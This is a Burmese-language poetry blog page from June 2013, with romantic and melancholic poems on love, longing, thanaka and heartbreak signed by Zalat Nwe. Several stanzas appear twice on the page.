ဇလပ်နွယ်
အရင်ကချစ်တယ်
မမြင်ရလွမ်းတယ်
ခင့်အသံမကြားရရင်
အိပ်မပျော်ဘူးကွယ်
ွှအချစ်ပညာအစုံတတ်အောင်သင်ပေးခဲ့တဲ့သူ
အခုတော့မမြင်မကြင်ချင်အောင်
တမင်ပုန်းလို့ရှောင်ခွာတိမ်းတဲ့သူ
မောင်မကြင်မမြင်ချင်ပေမဲ့
ကျမရင်နေဆယ်ဆကဲ
လွန်ပူပြင်းဒဏ်
သဲအူပြတ်မျှခစားရတာ
မခံနိုင်တာမို့
တောင်းပန်ခယပြောပါရစေသခင်
အားနာသနားငဲ့ညာကာ
တချက်လောက်တော့လှဲ့ကြည့်ပါမောင်။၊
ဇလပ်နွယ်
မြန်မာစံကဗျာဟန်နဲ့သူ
သူရဲ့သဏ္ဍာန် ကဗျာဆန်လှတယ်
သဘာဆန်တဲ့ သူတို့အလှ
အတိုအကွဲ ဖရိုဖရဲတွေကြား
ထင်းကနဲမြင်တဲ့ မင်းရဲ့ပုံစံ
ဆံကေသာနက်စင်း တံခွက်ခင်း
ဘယ်ညာပါးကွက်ကြားနဲ့
ဇာခြည်စင် ရင်ဖုံးအင်္ကျီ
လိုက်ဖက်ပါဘိ ချိတ်ထဘီ
ရေကျဲသနပ်ခါး တစ်ကိုယ်လုံးနဲ့
မွှေးလိုက်တဲ့ ရနံ့ စွေးစွေးနီ နှင်းဆီခမ်းနှင့်
ကြူကြူသာတဲ့ စကားသံ ချိုလှပါရဲ့ နားဝင်မှာ
ဆင်မရင်သာ လျှောက်တဲ့မာန်က
တစ်ထွာမက မြင့်မြင့်မားတွေကြား
တပြေးညီ ကတ္တီနဲ့ ၀င့်ဝင့်ကြွား
လျှောက်လမ်းကာ ရှုငြီးဖွယ် ရောင်စုံတွေကြား
သူ့အား နောက်နောင် တွေ့ဘူးဟန်မထင်.......။
သဘာဆန်တဲ့ သူတို့အလှ
အတိုအကွဲ ဖရိုဖရဲတွေကြား
ထင်းကနဲမြင်တဲ့ မင်းရဲ့ပုံစံ
ဆံကေသာနက်စင်း တံခွက်ခင်း
ဘယ်ညာပါးကွက်ကြားနဲ့
ဇာခြည်စင် ရင်ဖုံးအင်္ကျီ
လိုက်ဖက်ပါဘိ ချိတ်ထဘီ
ရေကျဲသနပ်ခါး တစ်ကိုယ်လုံးနဲ့
မွှေးလိုက်တဲ့ ရနံ့ စွေးစွေးနီ နှင်းဆီခမ်းနှင့်
ကြူကြူသာတဲ့ စကားသံ ချိုလှပါရဲ့ နားဝင်မှာ
ဆင်မရင်သာ လျှောက်တဲ့မာန်က
တစ်ထွာမက မြင့်မြင့်မားတွေကြား
တပြေးညီ ကတ္တီနဲ့ ၀င့်ဝင့်ကြွား
လျှောက်လမ်းကာ ရှုငြီးဖွယ် ရောင်စုံတွေကြား
သူ့အား နောက်နောင် တွေ့ဘူးဟန်မထင်.......။
ဇလပ်နွယ်
Wednesday, June 5, 2013
မောင့်လက်ဆောင်
အပြုံးချိုချိုအမူပိုကာ
အလွန်လှတဲ့မောင့်ချစ်သူ
မင်းကိုဧကန်ချစ်ပါသဖြင့်
မောင့်လက်ဆောင်အမှန်ပေးမယ်
အမြန်လိမ်ချယ်လာခဲ့ကွယ်
မောင့်ဆိုစကားရင်ဝယ်ထားလို့
ကျမပါးပြင်အလှဆင်ဖို့
မောင်ပေးတဲ့လက်ဆောင်
ရှင်မတောင်သနပ်ခါးအမှန်ချယ်သကာ
မောင့်ထံအသွားမြင်သူတကာ
သမင်လည်ပြန်အမှန်ကြည့်တော့ရှက်ရပြန်သေး
မောင့်ထံရောက်သွား
မောင့်ပြုံးချိုမြမျက်နှာလှနဲ့တည်ကြည်ကျက်သရေ
ဲိ့ပြီးပြည့်စုံတဲ့မောင့်အကြည့်အောက်
ရှက်သွေးဖျာနေရပါလည်း
ရွှေဘဝင်ဆူကျေနပ်သဖြင့်
အမြဲမပြတ်ကျမပါးပြင်
ရှင်မတောင်သနားခါးအမှန်ချယ်သနေတော့မယ်နော်
အလွန်လှတဲ့မောင့်ချစ်သူ
မင်းကိုဧကန်ချစ်ပါသဖြင့်
မောင့်လက်ဆောင်အမှန်ပေးမယ်
အမြန်လိမ်ချယ်လာခဲ့ကွယ်
မောင့်ဆိုစကားရင်ဝယ်ထားလို့
ကျမပါးပြင်အလှဆင်ဖို့
မောင်ပေးတဲ့လက်ဆောင်
ရှင်မတောင်သနပ်ခါးအမှန်ချယ်သကာ
မောင့်ထံအသွားမြင်သူတကာ
သမင်လည်ပြန်အမှန်ကြည့်တော့ရှက်ရပြန်သေး
မောင့်ထံရောက်သွား
မောင့်ပြုံးချိုမြမျက်နှာလှနဲ့တည်ကြည်ကျက်သရေ
ဲိ့ပြီးပြည့်စုံတဲ့မောင့်အကြည့်အောက်
ရှက်သွေးဖျာနေရပါလည်း
ရွှေဘဝင်ဆူကျေနပ်သဖြင့်
အမြဲမပြတ်ကျမပါးပြင်
ရှင်မတောင်သနားခါးအမှန်ချယ်သနေတော့မယ်နော်
ဖြစ်ချင်တယ်
ကမ္ဘာကြီးကအကျယ်ကြီး
လူတွေကလည်းအများကြီး
ဒါပေမဲ့ကိုယ်ကမင်းကိုဘဲချစ်ခဲ့တာပါ
ဘုရားသခင်ကကမင်းကို
ကိုယ့်အတွက်ရွေးချယ်ပေးတယ်ထင်တယ်
ကံကြမ္မာကစမ်းသပ်တာတော့ခံရမှာပေါ့
လက်ချင်းတွဲ...စိတ်မပျက်ဘဲ ဆက်သွားမယ်နော်
အနေဝေးကွာ
မတွေ့သာလည်း
ကိုယ့်စိတ်ထဲမှာအမြဲရှိနေပါတယ်
အနမ်းတစ်ရာမက
တို့တွေရဖို့
အလွမ်းကမ္ဘာမကကျော်ဖြတ်မယ်
မနက်ဖြန်ဆိုတာ
ချစ်သူတို့ပျော်မွေ့ရာနေ့ဖြစ်ပါစေနော်..။
ဇလပ်နွယ်
လူတွေကလည်းအများကြီး
ဒါပေမဲ့ကိုယ်ကမင်းကိုဘဲချစ်ခဲ့တာပါ
ဘုရားသခင်ကကမင်းကို
ကိုယ့်အတွက်ရွေးချယ်ပေးတယ်ထင်တယ်
ကံကြမ္မာကစမ်းသပ်တာတော့ခံရမှာပေါ့
လက်ချင်းတွဲ...စိတ်မပျက်ဘဲ ဆက်သွားမယ်နော်
အနေဝေးကွာ
မတွေ့သာလည်း
ကိုယ့်စိတ်ထဲမှာအမြဲရှိနေပါတယ်
အနမ်းတစ်ရာမက
တို့တွေရဖို့
အလွမ်းကမ္ဘာမကကျော်ဖြတ်မယ်
မနက်ဖြန်ဆိုတာ
ချစ်သူတို့ပျော်မွေ့ရာနေ့ဖြစ်ပါစေနော်..။
ဇလပ်နွယ်
နားတော့
ချစ်တယ်လို့မရမက
စပြောခဲ့တာမောင်
ကျမကလည်းမောင့်ကို
ချစ်တယ်လို့ပြောပြီးသွားပြီ
အနားညီတာမညီတာ
အလွှာတူတာမတူတာ
ဘာဘာညာညာမတိုင်းနဲ့
အသိုင်းအ၀ိုင်းပြိုင်ပွဲလား
ဘာသာလုတာလား
ချစ်တာကိုဘယ်အရာနဲ့
တားမလို့လည်း
နောက်ကြသွားပြီး
နားတော့နော်
ဇလပ်နွယ်
စပြောခဲ့တာမောင်
ကျမကလည်းမောင့်ကို
ချစ်တယ်လို့ပြောပြီးသွားပြီ
အနားညီတာမညီတာ
အလွှာတူတာမတူတာ
ဘာဘာညာညာမတိုင်းနဲ့
အသိုင်းအ၀ိုင်းပြိုင်ပွဲလား
ဘာသာလုတာလား
ချစ်တာကိုဘယ်အရာနဲ့
တားမလို့လည်း
နောက်ကြသွားပြီး
နားတော့နော်
ဇလပ်နွယ်
မောင့်အချစ်
မောင့်
အချစ်ရယ်ကပင်မြင့်ပေါ်နေပြန်လည်း
လေအတင့်မှာသင်းကြူကာ
ရနံဆောင်ရူရသူ ဘဝင်မြူးကာ
ရူးရမတတ်ပင်၊။
မောင့်အချစ်ရယ်က မြေခကာကြွေပြန်လည်း
မြေခပန်းရယ်လို့အလှမပျက်
အနံရယ်မပြယ်ပါဘူး
ထုံသင်းကာနေမြဲကွယ်။။
အပိုဆင့်ကာတင့်လိုက်ပုံက
သောကခံစားဝေဒနာများသူကို
ဆေးဖက်အဖြစ်အသုံးဝင်ကာ
ဖြည့်စွမ်းပြန်တယ်။။
ဒီပန်းအမည် ပန်းခရေလူသိများသလို
မောင့်အချစ်အမှန်ရတဲ့
ဇလပ်နွယ်ကံကောင်းပုံက
မောင့်အချစ်ပန်းခရေ
တင့်တယ်စွာဆင်းမြန်ခွင့်ရသဖြင့်
သွေးဆူးကာဘဝင်မြင့်
ရူးရပြန်သေး၊။
ဇလပ်နွယ်
အချစ်ရယ်ကပင်မြင့်ပေါ်နေပြန်လည်း
လေအတင့်မှာသင်းကြူကာ
ရနံဆောင်ရူရသူ ဘဝင်မြူးကာ
ရူးရမတတ်ပင်၊။
မောင့်အချစ်ရယ်က မြေခကာကြွေပြန်လည်း
မြေခပန်းရယ်လို့အလှမပျက်
အနံရယ်မပြယ်ပါဘူး
ထုံသင်းကာနေမြဲကွယ်။။
အပိုဆင့်ကာတင့်လိုက်ပုံက
သောကခံစားဝေဒနာများသူကို
ဆေးဖက်အဖြစ်အသုံးဝင်ကာ
ဖြည့်စွမ်းပြန်တယ်။။
ဒီပန်းအမည် ပန်းခရေလူသိများသလို
မောင့်အချစ်အမှန်ရတဲ့
ဇလပ်နွယ်ကံကောင်းပုံက
မောင့်အချစ်ပန်းခရေ
တင့်တယ်စွာဆင်းမြန်ခွင့်ရသဖြင့်
သွေးဆူးကာဘဝင်မြင့်
ရူးရပြန်သေး၊။
ဇလပ်နွယ်
8လပြည့်အမှတ်တရ
အိပ်မက်တွေသာ
တကယ်ပါဆိုရင်
တွယ်တာမိတာ
မမှားပါဘူးနော်...။
လရောင်ဖိတ်ကျ
အိပ်မရဘူး
ခဏခဏ
သတိရတာ
အတိအကျသိချင်တယ်....။
လေပြေတိုက်လည်း
အတွေးထဲမှာ
အမြဲလာသူ
မငြူစူရင်
တူတူပျော်ကြ
အမှတ်ရအောင်
ညီမျှနှောင်ထုံး
သည်းနှလုံးလေးပေးချင်တယ်။
နှင်းတွေကျလည်း
မအေးရဲဘူး
အသည်းကလေး
ပြန်ပြန်နွှေးလို့
တွေးတွေးဆဆ
ပြန်ဆက်သချင်
မင်းရင်ခွင်ထက်ထားချင်တယ်၊၊
ဒိီကဗျာလေးနဲ့ဒ်ီပုံလေးက
ဇလပ်ဘဝရဲ့မပျောက်ပျက်နိုင်သော်
အမှတ်တရပါနော်
ဇလပ်နွယ်
တကယ်ပါဆိုရင်
တွယ်တာမိတာ
မမှားပါဘူးနော်...။
လရောင်ဖိတ်ကျ
အိပ်မရဘူး
ခဏခဏ
သတိရတာ
အတိအကျသိချင်တယ်....။
လေပြေတိုက်လည်း
အတွေးထဲမှာ
အမြဲလာသူ
မငြူစူရင်
တူတူပျော်ကြ
အမှတ်ရအောင်
ညီမျှနှောင်ထုံး
သည်းနှလုံးလေးပေးချင်တယ်။
နှင်းတွေကျလည်း
မအေးရဲဘူး
အသည်းကလေး
ပြန်ပြန်နွှေးလို့
တွေးတွေးဆဆ
ပြန်ဆက်သချင်
မင်းရင်ခွင်ထက်ထားချင်တယ်၊၊
ဒိီကဗျာလေးနဲ့ဒ်ီပုံလေးက
ဇလပ်ဘဝရဲ့မပျောက်ပျက်နိုင်သော်
အမှတ်တရပါနော်
ဇလပ်နွယ်
သစ်ရွက်ခြောက်
အလည်သဘောပဲလား
ချစ်ဧည့်သည်
ရောက်လာလည်း တိတ်တခိုးလေးပါပဲ
ထွက်သွားလည်း မသိအောင်ကိုပဲ
မချစ်တာ သိတယ့်နောက်
ဆိတ်ညံဆဲ နှလုံးသားလေးဟာ
ဆွံအစွာနဲပဲ သေဆုံးနေခဲ့တယ်
ဟန်ဆောင်စွာနဲ့ ချစ်တယ်ပြောတိုင်း
တစ်ချက်ချက်သေဆုံးတယ့်နှလုံးသားက
ပြန်လည်အသက်သွင်းသလို
လှုပ်နှိုးလာပီး
ဥပေက္ခာ ပြုခံရတိုင်းအချိန်တိုင်း သေဆုံးရပါတယ်
ရှင်သန်ရာ ဘ၀မှာ သေဆုံးတယ့်
နှလုံးသားတစ်စုံနဲ့ ဘယ်လိုများ
ဘယ်လိုများရပ်တည်နိုင်မှာလည်း ချစ်ရယ်........
Miss Z LN
လမိုက်ခြင်းနဲ့ ၀ိုင်တစ်ခွက်
လွမ်းဆွတ်ခြင်းနဲ့ ဆေးလိပ်တို
ကြေကွဲခြင်းနဲ့ ချစ်မျက်ရည်
ဒီလိုညမျိုး ငါ့အတွက်တော့
အစဉ်လာထဲက အဖြစ်ဆိုး
တစ်မျိုးတစ်မျိုးနဲ့ ချည်ကာထုံးခဲလို့
သည်အချစ်နွံထဲမှာ
လှုပ်လေ မြှပ်လေ ဖြစ်ခဲ့လေပီ ဇလပ်
လွမ်းဆွတ်ခြင်းနဲ့ ဆေးလိပ်တို
ကြေကွဲခြင်းနဲ့ ချစ်မျက်ရည်
ဒီလိုညမျိုး ငါ့အတွက်တော့
အစဉ်လာထဲက အဖြစ်ဆိုး
တစ်မျိုးတစ်မျိုးနဲ့ ချည်ကာထုံးခဲလို့
သည်အချစ်နွံထဲမှာ
လှုပ်လေ မြှပ်လေ ဖြစ်ခဲ့လေပီ ဇလပ်
Tuesday, June 4, 2013
အိမ်ကလေး
တစ်နှစ်ပြည့်ပီပဲ ခိုင်ပါ့မလား
သစ္စာတရားနဲ့ဆောက်ထားတယ့်
အနာဂတ်ရဲ့ အိမ်ကလေး
အချစ်များနဲ့ဆေးခြယ်ထားတယ့်
သံယောဇဉ်အိမ်ကလေး
နားလည်မှုနဲ့ ဆောက်တည်ထားတယ့်
လေထဲက အိမ်ကလေး
သံသယမုန်တိုင်းတွေဖျက်ပါစေ
တည်တံ့နေတယ့် ချစ်အိမ်လေး
ဒါပေမယ့် နင်မရှိပဲ ဒီအိမ်လေးကို မဆောက်နိုင်ဘူးဆိုတာ ဇလပ်သိပါစေ....................
ရွက်ငယ်..
ဖူးသစ် ရွက်ငယ်
သက်လျှောကြွေလို့ မြေခတော့မယ်
ဝေချိန်မှာလည်း မစိမ်းလန်းခဲ့သလို
ကြွေချိန်မှာလည်း မစိမ်းနိုင်တော့ပါဘူး
ရွက်ငယ်ရယ် ငါလည်း နင့်လိုပါပဲ
ရော်လစ် နှလုံးသားလေး
ချစ်သူရဲ့ အမုန်းအောက်မှာ
ခရတော့မယ်
ဘယ်လိုနည်းနဲ့ ကြွေရမှာလည်း
ချစ်သူဘ၀မှာလည်း
သံသယများနဲ့မပျော်ရွင်နိုင်ဘူး
နောက်ဆုံးချိန်မှာလည်း
အပူမီးတွေနဲ့ ဟန်ဆောင်တောင်မပြုံးနိုင်ဘူး.....
ဒါပေမယ့်ရွက်ငယ် ငါနင့်ထက်သာခဲ့တယ်
သူ့ဟန်ဆောင်ချစ်ကို ငါရလိုက်တယ် ရွက်ငယ်....
သက်လျှောကြွေလို့ မြေခတော့မယ်
ဝေချိန်မှာလည်း မစိမ်းလန်းခဲ့သလို
ကြွေချိန်မှာလည်း မစိမ်းနိုင်တော့ပါဘူး
ရွက်ငယ်ရယ် ငါလည်း နင့်လိုပါပဲ
ရော်လစ် နှလုံးသားလေး
ချစ်သူရဲ့ အမုန်းအောက်မှာ
ခရတော့မယ်
ဘယ်လိုနည်းနဲ့ ကြွေရမှာလည်း
ချစ်သူဘ၀မှာလည်း
သံသယများနဲ့မပျော်ရွင်နိုင်ဘူး
နောက်ဆုံးချိန်မှာလည်း
အပူမီးတွေနဲ့ ဟန်ဆောင်တောင်မပြုံးနိုင်ဘူး.....
ဒါပေမယ့်ရွက်ငယ် ငါနင့်ထက်သာခဲ့တယ်
သူ့ဟန်ဆောင်ချစ်ကို ငါရလိုက်တယ် ရွက်ငယ်....
Subscribe to:
Posts (Atom)